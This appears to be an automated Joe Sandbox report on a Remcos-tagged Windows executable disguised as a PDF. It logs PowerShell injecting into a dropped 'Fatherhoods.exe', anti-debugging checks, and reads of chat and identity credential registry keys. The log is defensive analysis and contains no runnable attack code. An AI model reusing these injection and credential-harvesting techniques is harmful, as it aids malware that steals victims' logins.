Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6965	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2831	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Window / User API: threadDelayed 2414	Jump to behavior

Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\BgImage.dll	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\UserInfo.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	API coverage: 3.2 %
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	API coverage: 10.0 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe TID: 2068	Thread sleep count: 2414 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4868	Thread sleep time: -30000s >= -30000s	Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQ24060084#U00b7pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
RFQ24060084#U00b7pdf.exe

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109246580.0000000006120000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2584577251.000001BFC145B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2582639060.000001BFBBE2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006098000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW m

Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	API call chain: ExitProcess graph end node	graph_0-3064
Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	API call chain: ExitProcess graph end node	graph_0-3237
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	API call chain: ExitProcess graph end node	graph_18-34076

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C22639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_22C22639
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C22B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_22C22B1C
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C260E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_22C260E2

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe base: 16C0000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe base: 19FFF4			Jump to behavior

Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerles\*
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager>$~
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager4D\,$
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr]
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manageroz
Source: Fatherhoods.exe, 00000007.00000002.2602798780.0000000022CAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager4
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager4D\H$h
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager4D\*
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager4D\
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: Fatherhoods.exe, 00000007.00000002.2602798780.0000000022CAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerE
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerder7$q
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager4D\A$c
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.0000000006098000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerkuhxZ$Z

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk